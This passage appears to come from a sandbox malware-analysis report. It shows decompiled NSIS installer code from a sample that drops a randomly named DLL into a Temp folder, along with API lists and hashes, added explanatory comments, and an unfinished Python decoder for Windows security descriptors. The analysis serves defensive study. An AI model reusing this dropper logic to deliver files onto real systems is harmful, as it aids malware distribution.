                                                                                    							 *0x42ec34 = _t87;
                                                                                    							if(_t80 > _t93) {
                                                                                    								goto L29;
                                                                                    							}
                                                                                    							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                                                                                    								_v8 = _v8 + 1;
                                                                                    								_t93 = _t80 - 4;
                                                                                    								if(_t90 > _t93) {
                                                                                    									_t90 = _t93;
                                                                                    								}
                                                                                    								goto L20;
                                                                                    							} else {
                                                                                    								break;
                                                                                    							}
                                                                                    						}
                                                                                    						L20:
                                                                                    						if(_t93 <  *0x428c50) {
                                                                                    							_v12 = E00405FC6(_v12, 0x420c50, _t90);
                                                                                    						}
                                                                                    						 *0x414c40 =  *0x414c40 + _t90;
                                                                                    						_t93 = _t93 - _t90;
                                                                                    					} while (_t93 > 0);
                                                                                    					_t82 = 0;
                                                                                    					goto L24;
                                                                                    				}
                                                                                    			}
                                                                                    0x00402ddd
                                                                                    0x00402e01
                                                                                    0x00402e06
                                                                                    0x00402e0c
                                                                                    0x00402e17
                                                                                    0x00402e1c
                                                                                    0x00402e1f
                                                                                    0x00402e20
                                                                                    0x00402e21
                                                                                    0x00402e23
                                                                                    0x00402e2b
                                                                                    0x00402e42
                                                                                    0x00402e4a
                                                                                    0x00402e4f
                                                                                    0x00402e51
                                                                                    0x00402e51
                                                                                    0x00402e59
                                                                                    0x00402e59
                                                                                    0x00402e5c
                                                                                    0x00402e5d
                                                                                    0x00402e5d
                                                                                    0x00402e60
                                                                                    0x00402e62
                                                                                    0x00402e62
                                                                                    0x00402e6c
                                                                                    0x00402e72
                                                                                    0x00402e80
                                                                                    0x00000000
                                                                                    0x00402e85
                                                                                    0x00000000
                                                                                    0x00402e2b
                                                                                    0x00402de5
                                                                                    0x00402df7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402ce3
                                                                                    0x00402ce8
                                                                                    0x00402ced
                                                                                    0x00402cf1
                                                                                    0x00402cf8
                                                                                    0x00402cff
                                                                                    0x00402d01
                                                                                    0x00402d01
                                                                                    0x00402d05
                                                                                    0x00402d0c
                                                                                    0x00402e36
                                                                                    0x00402e2d
                                                                                    0x00000000
                                                                                    0x00402e2d
                                                                                    0x00402d19
                                                                                    0x00402d99
                                                                                    0x00402d9d
                                                                                    0x00402da2
                                                                                    0x00000000
                                                                                    0x00402d99
                                                                                    0x00402d22
                                                                                    0x00402d27
                                                                                    0x00402d2f
                                                                                    0x00402d55
                                                                                    0x00402d5b
                                                                                    0x00402d64
                                                                                    0x00402d6a
                                                                                    0x00402d6f
                                                                                    0x00402d75
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402d7f
                                                                                    0x00402d87
                                                                                    0x00402d8a
                                                                                    0x00402d8f
                                                                                    0x00402d91
                                                                                    0x00402d91
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402d7f
                                                                                    0x00402da3
                                                                                    0x00402da9
                                                                                    0x00402db5
                                                                                    0x00402db5
                                                                                    0x00402db8
                                                                                    0x00402dbe
                                                                                    0x00402dc0
                                                                                    0x00402dc8
                                                                                    0x00000000
                                                                                    0x00402dc8

                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 00402C66
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Nz7NA3F7z7.exe,00000400), ref: 00402C82
                                                                                      • Part of subcall function 0040589E: GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\Nz7NA3F7z7.exe,80000000,00000003), ref: 004058A2
                                                                                      • Part of subcall function 0040589E: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004058C4
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Nz7NA3F7z7.exe,C:\Users\user\Desktop\Nz7NA3F7z7.exe,80000000,00000003), ref: 00402CCE
                                                                                    Strings
                                                                                    • "C:\Users\user\Desktop\Nz7NA3F7z7.exe" , xrefs: 00402C55
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C5F
                                                                                    • C:\Users\user\Desktop\Nz7NA3F7z7.exe, xrefs: 00402C6C, 00402C7B, 00402C8F, 00402CAF
                                                                                    • Inst, xrefs: 00402D3A
                                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E2D
                                                                                    • Error launching installer, xrefs: 00402CA5
                                                                                    • C:\Users\user\Desktop, xrefs: 00402CB0, 00402CB5, 00402CBB
                                                                                    • Null, xrefs: 00402D4C
                                                                                    • soft, xrefs: 00402D43
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                    • String ID: "C:\Users\user\Desktop\Nz7NA3F7z7.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Nz7NA3F7z7.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                    • API String ID: 4283519449-1505292531
                                                                                    • Opcode ID: d7843f665ea2917adf3dcfe78593387cec42cc0a537a0d0ef4c304b969a704fe
                                                                                    • Instruction ID: 196f3fd9364ed88bbd27218647615838fe3130e8ea263fbe41a0cbd6df82c613
                                                                                    • Opcode Fuzzy Hash: d7843f665ea2917adf3dcfe78593387cec42cc0a537a0d0ef4c304b969a704fe
                                                                                    • Instruction Fuzzy Hash: 6A510871941218ABDB609F66DE89B9E7BB8EF00314F10403BF904B62D1CBBC9D418B9D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 95%
                                                                                    			E00402E8E(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
                                                                                    				signed int _v8;
                                                                                    				long _v12;
                                                                                    				void* _v16;
                                                                                    				long _v20;
                                                                                    				long _v24;
                                                                                    				intOrPtr _v28;
                                                                                    				char _v92;
                                                                                    				void* _t67;
                                                                                    				void* _t68;
                                                                                    				long _t74;
                                                                                    				intOrPtr _t79;
                                                                                    				long _t80;
                                                                                    				void* _t82;
                                                                                    				int _t84;
                                                                                    				void* _t97;
                                                                                    				void* _t100;
                                                                                    				long _t101;
                                                                                    				signed int _t102;
                                                                                    				long _t103;
                                                                                    				int _t104;
                                                                                    				intOrPtr _t105;
                                                                                    				long _t106;
                                                                                    				void* _t107;
                                                                                    
                                                                                    				_t102 = _a16;
                                                                                    				_t97 = _a12;
                                                                                    				_v12 = _t102;
                                                                                    				if(_t97 == 0) {
                                                                                    					_v12 = 0x8000;
                                                                                    				}
                                                                                    				_v8 = _v8 & 0x00000000;
                                                                                    				_v16 = _t97;
                                                                                    				if(_t97 == 0) {
                                                                                    					_v16 = 0x418c48;
                                                                                    				}
                                                                                    				_t65 = _a4;
                                                                                    				if(_a4 >= 0) {
                                                                                    					E004030E2( *0x42ec78 + _t65);
                                                                                    				}
                                                                                    				_t67 = E004030B0( &_a16, 4); // executed
                                                                                    				if(_t67 == 0) {
                                                                                    					L34:
                                                                                    					_push(0xfffffffd);
                                                                                    					goto L35;
                                                                                    				} else {
                                                                                    					if((_a19 & 0x00000080) == 0) {
                                                                                    						if(_t97 == 0) {
                                                                                    							while(_a16 > 0) {
                                                                                    								_t103 = _v12;
                                                                                    								if(_a16 < _t103) {
                                                                                    									_t103 = _a16;
                                                                                    								}
                                                                                    								if(E004030B0(0x414c48, _t103) == 0) {
                                                                                    									goto L34;
                                                                                    								} else {
                                                                                    									if(WriteFile(_a8, 0x414c48, _t103,  &_a12, 0) == 0 || _t103 != _a12) {
                                                                                    										L29:
                                                                                    										_push(0xfffffffe);
                                                                                    										L35:
                                                                                    										_pop(_t68);
                                                                                    										return _t68;
                                                                                    									} else {
                                                                                    										_v8 = _v8 + _t103;
                                                                                    										_a16 = _a16 - _t103;
                                                                                    										continue;
                                                                                    									}
                                                                                    								}
                                                                                    							}
                                                                                    							L45:
                                                                                    							return _v8;
                                                                                    						}
                                                                                    						if(_a16 < _t102) {
                                                                                    							_t102 = _a16;
                                                                                    						}
                                                                                    						if(E004030B0(_t97, _t102) != 0) {
                                                                                    							_v8 = _t102;
                                                                                    							goto L45;
                                                                                    						} else {
                                                                                    							goto L34;
                                                                                    						}
                                                                                    					}
                                                                                    					_t74 = GetTickCount();
                                                                                    					 *0x40b5ac =  *0x40b5ac & 0x00000000;
                                                                                    					 *0x40b5a8 =  *0x40b5a8 & 0x00000000;
                                                                                    					_t14 =  &_a16;
                                                                                    					 *_t14 = _a16 & 0x7fffffff;
                                                                                    					_v20 = _t74;
                                                                                    					 *0x40b090 = 8;
                                                                                    					 *0x414c38 = 0x40cc30;
                                                                                    					 *0x414c34 = 0x40cc30;
                                                                                    					 *0x414c30 = 0x414c30;
                                                                                    					_a4 = _a16;
                                                                                    					if( *_t14 <= 0) {
                                                                                    						goto L45;
                                                                                    					} else {
                                                                                    						goto L9;
                                                                                    					}
                                                                                    					while(1) {
                                                                                    						L9:
                                                                                    						_t104 = 0x4000;
                                                                                    						if(_a16 < 0x4000) {
                                                                                    							_t104 = _a16;
                                                                                    						}
                                                                                    						if(E004030B0(0x414c48, _t104) == 0) {
                                                                                    							goto L34;
                                                                                    						}
                                                                                    						_a16 = _a16 - _t104;
                                                                                    						 *0x40b080 = 0x414c48;
                                                                                    						 *0x40b084 = _t104;
                                                                                    						while(1) {
                                                                                    							_t100 = _v16;
                                                                                    							 *0x40b088 = _t100;
                                                                                    							 *0x40b08c = _v12;
                                                                                    							_t79 = E00406034(0x40b080);
                                                                                    							_v28 = _t79;
                                                                                    							if(_t79 < 0) {
                                                                                    								break;
                                                                                    							}
                                                                                    							_t105 =  *0x40b088; // 0x41af03
                                                                                    							_t106 = _t105 - _t100;
                                                                                    							_t80 = GetTickCount();
                                                                                    							_t101 = _t80;
                                                                                    							if(( *0x42ecd4 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
                                                                                    								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                                                    								_t107 = _t107 + 0xc;
                                                                                    								E00404EB3(0,  &_v92);
                                                                                    								_v20 = _t101;
                                                                                    							}
                                                                                    							if(_t106 == 0) {
                                                                                    								if(_a16 > 0) {
                                                                                    									goto L9;
                                                                                    								}
                                                                                    								goto L45;
                                                                                    							} else {
                                                                                    								if(_a12 != 0) {
                                                                                    									_t82 =  *0x40b088; // 0x41af03
                                                                                    									_v8 = _v8 + _t106;
                                                                                    									_v12 = _v12 - _t106;
                                                                                    									_v16 = _t82;
                                                                                    									L24:
                                                                                    									if(_v28 != 1) {
                                                                                    										continue;
                                                                                    									}
                                                                                    									goto L45;
                                                                                    								}
                                                                                    								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
                                                                                    								if(_t84 == 0 || _v24 != _t106) {
                                                                                    									goto L29;
                                                                                    								} else {
                                                                                    									_v8 = _v8 + _t106;
                                                                                    									goto L24;
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    						_push(0xfffffffc);
                                                                                    						goto L35;
                                                                                    					}
                                                                                    					goto L34;
                                                                                    				}
                                                                                    			}

                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 00402EF5
                                                                                    • GetTickCount.KERNEL32 ref: 00402F9C
                                                                                    • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402FC5
                                                                                    • wsprintfA.USER32 ref: 00402FD5
                                                                                    • WriteFile.KERNELBASE(00000000,00000000,0041AF03,7FFFFFFF,00000000), ref: 00403003
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: CountTick$FileWritewsprintf
                                                                                    • String ID: ... %d%%$HLA$HLA
                                                                                    • API String ID: 4209647438-295942573
                                                                                    • Opcode ID: 2ed182f22c19ccbe5ebd44aa976ae303b5dd6c485202a0ec0c370d738780273e
                                                                                    • Instruction ID: 15109c7e5c0d48913ae26536c30eb2ff4c12f072ab55fd5dd83b367320b2a29b
                                                                                    • Opcode Fuzzy Hash: 2ed182f22c19ccbe5ebd44aa976ae303b5dd6c485202a0ec0c370d738780273e
                                                                                    • Instruction Fuzzy Hash: 2C618E71902219DBDB10DF65EA44AAF7BB8EB04356F10417BF910B72C4D7789A40CBE9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 73%
                                                                                    			E00401751(FILETIME* __ebx, void* __eflags) {
                                                                                    				void* _t33;
                                                                                    				void* _t41;
                                                                                    				void* _t43;
                                                                                    				FILETIME* _t49;
                                                                                    				FILETIME* _t62;
                                                                                    				void* _t64;
                                                                                    				signed int _t70;
                                                                                    				FILETIME* _t71;
                                                                                    				FILETIME* _t75;
                                                                                    				signed int _t77;
                                                                                    				void* _t80;
                                                                                    				CHAR* _t82;
                                                                                    				void* _t85;
                                                                                    
                                                                                    				_t75 = __ebx;
                                                                                    				_t82 = E00402A29(0x31);
                                                                                    				 *(_t85 - 0xc) = _t82;
                                                                                    				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
                                                                                    				_t33 = E00405727(_t82);
                                                                                    				_push(_t82);
                                                                                    				if(_t33 == 0) {
                                                                                    					lstrcatA(E004056BA(E00405BC7(0x409c40, 0x434800)), ??);
                                                                                    				} else {
                                                                                    					_push(0x409c40);
                                                                                    					E00405BC7();
                                                                                    				}
                                                                                    				E00405E29(0x409c40);
                                                                                    				while(1) {
                                                                                    					__eflags =  *(_t85 + 8) - 3;
                                                                                    					if( *(_t85 + 8) >= 3) {
                                                                                    						_t64 = E00405EC2(0x409c40);
                                                                                    						_t77 = 0;
                                                                                    						__eflags = _t64 - _t75;
                                                                                    						if(_t64 != _t75) {
                                                                                    							_t71 = _t64 + 0x14;
                                                                                    							__eflags = _t71;
                                                                                    							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
                                                                                    						}
                                                                                    						asm("sbb eax, eax");
                                                                                    						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                                                                    						__eflags = _t70;
                                                                                    						 *(_t85 + 8) = _t70;
                                                                                    					}
                                                                                    					__eflags =  *(_t85 + 8) - _t75;
                                                                                    					if( *(_t85 + 8) == _t75) {
                                                                                    						E0040587F(0x409c40);
                                                                                    					}
                                                                                    					__eflags =  *(_t85 + 8) - 1;
                                                                                    					_t41 = E0040589E(0x409c40, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                                                                    					__eflags = _t41 - 0xffffffff;
                                                                                    					 *(_t85 - 8) = _t41;
                                                                                    					if(_t41 != 0xffffffff) {
                                                                                    						break;
                                                                                    					}
                                                                                    					__eflags =  *(_t85 + 8) - _t75;
                                                                                    					if( *(_t85 + 8) != _t75) {
                                                                                    						E00404EB3(0xffffffe2,  *(_t85 - 0xc));
                                                                                    						__eflags =  *(_t85 + 8) - 2;
                                                                                    						if(__eflags == 0) {
                                                                                    							 *((intOrPtr*)(_t85 - 4)) = 1;
                                                                                    						}
                                                                                    						L31:
                                                                                    						 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t85 - 4));
                                                                                    						__eflags =  *0x42eca8;
                                                                                    						goto L32;
                                                                                    					} else {
                                                                                    						E00405BC7(0x40a440, 0x42f000);
                                                                                    						E00405BC7(0x42f000, 0x409c40);
                                                                                    						E00405BE9(_t75, 0x40a440, 0x409c40, "C:\Users\hardz\AppData\Local\Temp\nso7CE9.tmp\eeysn2cunceh9.dll",  *((intOrPtr*)(_t85 - 0x14)));
                                                                                    						E00405BC7(0x42f000, 0x40a440);
                                                                                    						_t62 = E00405488("C:\Users\hardz\AppData\Local\Temp\nso7CE9.tmp\eeysn2cunceh9.dll",  *(_t85 - 0x28) >> 3) - 4;
                                                                                    						__eflags = _t62;
                                                                                    						if(_t62 == 0) {
                                                                                    							continue;
                                                                                    						} else {
                                                                                    							__eflags = _t62 == 1;
                                                                                    							if(_t62 == 1) {
                                                                                    								 *0x42eca8 =  &( *0x42eca8->dwLowDateTime);
                                                                                    								L32:
                                                                                    								_t49 = 0;
                                                                                    								__eflags = 0;
                                                                                    							} else {
                                                                                    								_push(0x409c40);
                                                                                    								_push(0xfffffffa);
                                                                                    								E00404EB3();
                                                                                    								L29:
                                                                                    								_t49 = 0x7fffffff;
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    					L33:
                                                                                    					return _t49;
                                                                                    				}
                                                                                    				E00404EB3(0xffffffea,  *(_t85 - 0xc));
                                                                                    				 *0x42ecd4 =  *0x42ecd4 + 1;
                                                                                    				_t43 = E00402E8E( *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 8), _t75, _t75); // executed
                                                                                    				 *0x42ecd4 =  *0x42ecd4 - 1;
                                                                                    				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
                                                                                    				_t80 = _t43;
                                                                                    				if( *(_t85 - 0x1c) != 0xffffffff) {
                                                                                    					L22:
                                                                                    					SetFileTime( *(_t85 - 8), _t85 - 0x1c, _t75, _t85 - 0x1c);
                                                                                    				} else {
                                                                                    					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				// Almost certainly CloseHandle(hFile): the sandbox symbolizes this call under the
				// kernel32 alias FindCloseChangeNotification, which shares its code with CloseHandle.
				// Everything below matches the tail of NSIS's EW_EXTRACTFILE opcode handler, after
				// the compressed data block has been written to the output file.
				FindCloseChangeNotification( *(_t85 - 8)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;                                               // extraction result >= 0: success
				} else {
					// Error path. The negative constants are NSIS language-table IDs:
					// 0xffffffee (-18) = LANG_ERRORDECOMPRESSING, 0xffffffe9 (-23) = LANG_ERRORWRITING.
					// 0x409c40 is the shared NSIS string buffer; _t75/_t80 are register args the
					// decompiler carried along, not real parameters.
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405BE9(_t75, _t80, 0x409c40, 0x409c40, 0xffffffee); // GetNSISString(buf, LANG_ERRORDECOMPRESSING)
					} else {
						E00405BE9(_t75, _t80, 0x409c40, 0x409c40, 0xffffffe9); // GetNSISString(buf, LANG_ERRORWRITING)
						lstrcatA(0x409c40,  *(_t85 - 0xc));                    // append the output file name
					}
					// 0x200010 = MB_ICONSTOP | (IDOK << 21): NSIS's my_MessageBox(buf, flags), which
					// stores the answer to use for silent installs in the upper bits of the flags.
					_push(0x200010);
					_push(0x409c40);
					E00405488();
					goto L29;
				}
				goto L33;
			}

                                                                                    APIs
                                                                                    • lstrcatA.KERNEL32(00000000,00000000,Fdskdfkdsfsdfdsf,00434800,00000000,00000000,00000031), ref: 00401790
                                                                                    • CompareFileTime.KERNEL32(-00000014,?,Fdskdfkdsfsdfdsf,Fdskdfkdsfsdfdsf,00000000,00000000,Fdskdfkdsfsdfdsf,00434800,00000000,00000000,00000031), ref: 004017BA
                                                                                      • Part of subcall function 00405BC7: lstrcpynA.KERNEL32(?,?,00000400,004031D8,0042E420,NSIS Error), ref: 00405BD4
                                                                                      • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,0041AF03,74B5EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                                                                                      • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041AF03,74B5EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                                                                                      • Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041AF03,74B5EA30), ref: 00404F0F
                                                                                      • Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                                                                                      • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F47
                                                                                      • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F61
                                                                                      • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F6F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
• Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nso7CE9.tmp$C:\Users\user\AppData\Local\Temp\nso7CE9.tmp\eeysn2cunceh9.dll$Fdskdfkdsfsdfdsf
                                                                                    • API String ID: 1941528284-1851557007
                                                                                    • Opcode ID: 95e67b310e6745b10a35ef5b552587608c142c3317b69d328c6358dc637ee1da
                                                                                    • Instruction ID: c8ecff54efbd1983964958a71a4b78ec9a68474d29a8073c081a3edbe3f43163
                                                                                    • Opcode Fuzzy Hash: 95e67b310e6745b10a35ef5b552587608c142c3317b69d328c6358dc637ee1da
                                                                                    • Instruction Fuzzy Hash: 8541B631904514BBCB107BA6CC45DAF3678EF01329F60823BF521F11E1D63CAA419EAE
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
			E00405375(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				// Builds an absolute SECURITY_DESCRIPTOR on the stack from constants in .rdata.
				// The SIDs (0x40735c) and the DACL (0x40734c) are not part of this dump, so what
				// the DACL grants has to be read from those bytes. The same two pointer values are
				// what the "String ID" entry below renders as "Ls@" and "\s@" (0x40734c and
				// 0x40735c as little-endian ASCII); they are not real strings.
				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x40735c;
				_v36.Group = 0x40735c;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;                    // SECURITY_DESCRIPTOR_REVISION
				_v36.Control = 4;                     // SE_DACL_PRESENT only; SE_DACL_PROTECTED is not set here
				_v36.Dacl = 0x40734c;
				_v16.nLength = 0xc;                   // sizeof(SECURITY_ATTRIBUTES) on x86
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {                    // ERROR_ALREADY_EXISTS
					// The directory was already there: re-apply owner, group and DACL and mark the
					// DACL protected (0x80000007 = OWNER | GROUP | DACL | PROTECTED_DACL_SECURITY_INFORMATION),
					// which discards ACEs inherited from the parent. This is the behaviour of NSIS's
					// CreateRestrictedDirectory, used for $PLUGINSDIR (the nso*.tmp directory in the
					// strings above) so that a pre-created or inherited-writable plugin directory
					// cannot be used to plant DLLs the installer will load.
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}
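As an added example (not code from the report, from NSIS, or from the sample), the following Python decodes the structures this function builds: the absolute SECURITY_DESCRIPTOR at the offsets the decompiler shows, the SECURITY_INFORMATION mask passed to SetFileSecurityA, and an ACL/ACE/SID parser for reading whatever DACL sits at 0x40734c once those bytes are pulled from the dump. The SD bytes are reconstructed from the constants in the function; the two DACLs are constructed, hypothetical inputs, since the real ACL bytes are not on this page, and `world_writable` is a deliberately simplified check (explicit ACEs only, no canonical-order evaluation).

```python
"""Decoder for the Win32 security-descriptor material used by the
CreateDirectoryA / SetFileSecurityA pair in E00405375 (x86, absolute format).
Added example: every byte string here is CONSTRUCTED to mirror the constants in
the decompiled function; the real DACL and SIDs at 0x40734c / 0x40735c are not
in the dump, so the ACLs built below are hypothetical."""
import struct

SD_CONTROL = {
    0x0001: "SE_OWNER_DEFAULTED", 0x0002: "SE_GROUP_DEFAULTED",
    0x0004: "SE_DACL_PRESENT",    0x0008: "SE_DACL_DEFAULTED",
    0x0010: "SE_SACL_PRESENT",    0x0020: "SE_SACL_DEFAULTED",
    0x1000: "SE_DACL_PROTECTED",  0x2000: "SE_SACL_PROTECTED",
    0x8000: "SE_SELF_RELATIVE",
}
SECURITY_INFORMATION = {
    0x00000001: "OWNER_SECURITY_INFORMATION",
    0x00000002: "GROUP_SECURITY_INFORMATION",
    0x00000004: "DACL_SECURITY_INFORMATION",
    0x00000008: "SACL_SECURITY_INFORMATION",
    0x10000000: "UNPROTECTED_SACL_SECURITY_INFORMATION",
    0x20000000: "UNPROTECTED_DACL_SECURITY_INFORMATION",
    0x40000000: "PROTECTED_SACL_SECURITY_INFORMATION",
    0x80000000: "PROTECTED_DACL_SECURITY_INFORMATION",
}
ACE_TYPES = {0: "ACCESS_ALLOWED", 1: "ACCESS_DENIED"}
# GENERIC_ALL | GENERIC_WRITE | FILE_ADD_FILE | FILE_ADD_SUBDIRECTORY | FILE_DELETE_CHILD | DELETE:
# any of these lets a principal drop or replace files in a directory.
WRITE_RIGHTS = 0x10000000 | 0x40000000 | 0x0002 | 0x0004 | 0x0040 | 0x10000
WORLD_SIDS = {"S-1-1-0", "S-1-5-11", "S-1-5-32-545"}  # Everyone, Authenticated Users, Users


def decode_flags(value, table):
    """Expand a bitmask into the names in `table`, keeping unknown bits as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    unknown = value & ~sum(table) & 0xFFFFFFFF
    if unknown:
        names.append(f"0x{unknown:08x}")
    return names


def parse_absolute_sd(buf):
    """SECURITY_DESCRIPTOR (absolute, x86): Revision, Sbz1, Control, then four pointers."""
    rev, _sbz1, control, owner, group, sacl, dacl = struct.unpack_from("<BBHIIII", buf, 0)
    return {"Revision": rev, "Control": decode_flags(control, SD_CONTROL),
            "Owner": owner, "Group": group, "Sacl": sacl, "Dacl": dacl}


def build_sid(text):
    """Serialize 'S-1-5-32-544' into a binary SID (6-byte big-endian authority)."""
    parts = [int(p) for p in text.split("-")[1:]]
    rev, auth, subs = parts[0], parts[1], parts[2:]
    return bytes([rev, len(subs)]) + auth.to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)


def parse_sid(buf, off):
    rev, count = buf[off], buf[off + 1]
    auth = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "-".join(["S", str(rev), str(auth)] + [str(s) for s in subs])


def build_acl(aces):
    """ACL header (AclRevision=2) followed by ACCESS_ALLOWED/DENIED ACEs: (type, flags, mask, sid)."""
    body = b""
    for ace_type, ace_flags, mask, sid in aces:
        sid_bytes = build_sid(sid)
        body += struct.pack("<BBHI", ace_type, ace_flags, 8 + len(sid_bytes), mask) + sid_bytes
    return struct.pack("<BBHHH", 2, 0, 8 + len(body), len(aces), 0) + body


def parse_acl(buf):
    """Walk the ACE list; each ACE is a 4-byte header, a 4-byte access mask and a SID."""
    _rev, _sbz1, acl_size, count, _sbz2 = struct.unpack_from("<BBHHH", buf, 0)
    aces, off = [], 8
    for _ in range(count):
        ace_type, ace_flags, ace_size, mask = struct.unpack_from("<BBHI", buf, off)
        aces.append({"type": ACE_TYPES.get(ace_type, ace_type), "flags": ace_flags,
                     "mask": mask, "sid": parse_sid(buf, off + 8)})
        off += ace_size
    if off != acl_size:
        raise ValueError("ACL size does not match its ACEs")
    return aces


def world_writable(aces):
    """Simplified check: a world-style SID is explicitly allowed a planting right and not denied it."""
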